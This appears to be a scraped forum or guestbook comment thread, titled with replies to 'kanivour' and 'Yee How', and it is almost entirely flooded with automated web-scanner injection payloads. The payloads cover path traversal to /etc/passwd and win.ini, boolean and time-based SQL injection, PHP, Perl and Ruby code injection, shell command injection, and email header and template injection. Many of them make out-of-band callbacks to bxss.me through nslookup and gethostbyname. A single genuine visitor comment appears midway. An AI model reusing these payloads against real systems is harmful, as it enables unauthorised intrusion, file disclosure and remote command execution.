/./././././././././././././././././././././././././././././.
re: kanivour
file:///etc/passwd
re: kanivour
/\../\../\../\../\../\../\../etc/passwd
re: kanivour
/WEB-INF/web.xml
re: kanivour
C:\WINDOWS\system32\drivers\etc\hosts
re: kanivour
../../../../../../../../../../windows/win.ini%00.jpg
re: kanivour
)
re: kanivour
/../../../../../../../../../../boot.ini
re: kanivour
!(()&&!|*|*|
re: kanivour
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: kanivour
^(#$!@#$)(()))******
re: kanivour
..\..\..\..\..\..\..\..\windows\win.ini
re: kanivour
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: kanivour
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: kanivour
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: kanivour
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: kanivour
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: kanivour
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: kanivour
WEB-INF/web.xml
re: kanivour
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: kanivour
WEB-INF\web.xml
re: kanivour
Http://bxss.me/t/fit.txt
re: kanivour
http://bxss.me/t/fit.txt%3F.jpg
re: kanivour
/etc/shells
re: kanivour
c:/windows/win.ini
re: kanivour
bxss.me
re: kanivour
'.gethostbyname(lc('hitbn'.'rirmaxml13a36.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(65).chr(105).chr(83).'
re: kanivour
".gethostbyname(lc("hitls"."sujcsddo725a8.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(74).chr(111).chr(73)."
re: kanivour
HttP://bxss.me/t/xss.html?%00
re: kanivour
"+"A".concat(70-3).concat(22*4).concat(111).concat(83).concat(103).concat(80)+(require"socket"
Socket.gethostbyname("hitun"+"kupmjewh83eea.bxss.me.")[3].to_s)+"
re: kanivour
bxss.me/t/xss.html?%00
re: kanivour
'+'A'.concat(70-3).concat(22*4).concat(97).concat(90).concat(101).concat(70)+(require'socket'
Socket.gethostbyname('hitmx'+'kqmkrtbs0e07b.bxss.me.')[3].to_s)+'
re: kanivour
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kanivour
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: kanivour
';print(md5(31337));$a='
re: kanivour
";print(md5(31337));$a="
re: kanivour
${@print(md5(31337))}
re: kanivour
${@print(md5(31337))}\
re: kanivour
'"
re: kanivour
'.print(md5(31337)).'
re: kanivour
<!--
re: kanivour
1
re: kanivour
1
re: kanivour
-1 OR 2+309-309-1=0+0+0+1 --
re: kanivour
-1 OR 3+309-309-1=0+0+0+1 --
re: kanivour
-1 OR 2+777-777-1=0+0+0+1
re: kanivour
-1 OR 3+777-777-1=0+0+0+1
re: kanivour
-1' OR 2+473-473-1=0+0+0+1 --
re: kanivour
-1' OR 3+473-473-1=0+0+0+1 --
re: kanivour
-1' OR 2+714-714-1=0+0+0+1 or 'Ifbw3RAr'='
re: kanivour
-1' OR 3+714-714-1=0+0+0+1 or 'Ifbw3RAr'='
re: kanivour
-1" OR 2+455-455-1=0+0+0+1 --
re: kanivour
-1" OR 3+455-455-1=0+0+0+1 --
re: kanivour
if(now()=sysdate(),sleep(15),0)
re: kanivour
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Thanks to saito-san for the wonderful guide. Hi and happy to see all the familiar faces. I will be in Tokyo with my family next May. Happy to meet you guys if you all are free during the period.
re: Yee How
uwCmxrrR
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+203-203-1=0+0+0+1
re: Yee How
-1 OR 3+203-203-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
ppFWKtMd'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 235=(SELECT 235 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 711=(SELECT 711 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 78=(SELECT 78 FROM PG_SLEEP(15))--
re: Yee How
ZhwiQ4Rj' OR 453=(SELECT 453 FROM PG_SLEEP(15))--
re: Yee How
W6VRhCTN') OR 135=(SELECT 135 FROM PG_SLEEP(15))--
re: Yee How
DP4Yz4D1')) OR 710=(SELECT 710 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@BujbT
re: Yee How
1BYstYGqgYO
re: Yee How
response.write(9348636*9039043)
re: Yee How
'+response.write(9348636*9039043)+'
re: Yee How
"+response.write(9348636*9039043)+"
re: Yee How
%0abcc:074625.67-22251.67.f13a5.19990.2@bxss.me
re: Yee How
to@example.com>%0d%0abcc:074625.67-22252.67.f13a5.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
${9999622+9999814}
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
echo tqcscg$()\ hgftbb\nz^xyu||a #' &echo tqcscg$()\ hgftbb\nz^xyu||a #|" &echo tqcscg$()\ hgftbb\nz^xyu||a #
re: Yee How
/etc/passwd
re: Yee How
&echo cednuj$()\ flomnr\nz^xyu||a #' &echo cednuj$()\ flomnr\nz^xyu||a #|" &echo cednuj$()\ flomnr\nz^xyu||a #
re: Yee How
%2fetc%2fpasswd
re: Yee How
|echo hokzks$()\ bjbsqi\nz^xyu||a #' |echo hokzks$()\ bjbsqi\nz^xyu||a #|" |echo hokzks$()\ bjbsqi\nz^xyu||a #
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
)
re: Yee How
(nslookup hitdwrbdogfhq053df.bxss.me||perl -e "gethostbyname('hitdwrbdogfhq053df.bxss.me')")
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
$(nslookup hiturvhyuzfki3765b.bxss.me||perl -e "gethostbyname('hiturvhyuzfki3765b.bxss.me')")
re: Yee How
!(()&&!|*|*|
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
&nslookup hitzulgbkiafh3f35a.bxss.me&'\"`0&nslookup hitzulgbkiafh3f35a.bxss.me&`'
re: Yee How
^(#$!@#$)(()))******
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
&(nslookup hitnyqelcbvoed37a0.bxss.me||perl -e "gethostbyname('hitnyqelcbvoed37a0.bxss.me')")&'\"`0&(nslookup hitnyqelcbvoed37a0.bxss.me||perl -e "gethostbyname('hitnyqelcbvoed37a0.bxss.me')")&`'
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
|(nslookup hitebkkendjnw88322.bxss.me||perl -e "gethostbyname('hitebkkendjnw88322.bxss.me')")
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
`(nslookup hitkuzrhpwfnece824.bxss.me||perl -e "gethostbyname('hitkuzrhpwfnece824.bxss.me')")`
re: Yee How
;(nslookup hitrqfjbhwfsv35b22.bxss.me||perl -e "gethostbyname('hitrqfjbhwfsv35b22.bxss.me')")|(nslookup hitrqfjbhwfsv35b22.bxss.me||perl -e "gethostbyname('hitrqfjbhwfsv35b22.bxss.me')")&(nslookup hitrqfjbhwfsv35b22.bxss.me||perl -e "gethostbyname('hitrqfjbhwfsv35b22.bxss.me')")
re: Yee How
file:///etc/passwd
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
/WEB-INF/web.xml
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
'.gethostbyname(lc('hituu'.'epedjaygc35c9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(117).chr(87).'
re: Yee How
/etc/shells
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
".gethostbyname(lc("hitzg"."rqajbsha0c39f.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(89).chr(117).chr(72)."
re: Yee How
c:/windows/win.ini
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
bxss.me
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
WEB-INF/web.xml
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(117).concat(81).concat(116).concat(89)+(require"socket"
Socket.gethostbyname("hitso"+"jhjqdkis4a938.bxss.me.")[3].to_s)+"
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
WEB-INF\web.xml
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(114).concat(82).concat(120).concat(88)+(require'socket'
Socket.gethostbyname('hityz'+'rmryjedj4c796.bxss.me.')[3].to_s)+'
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
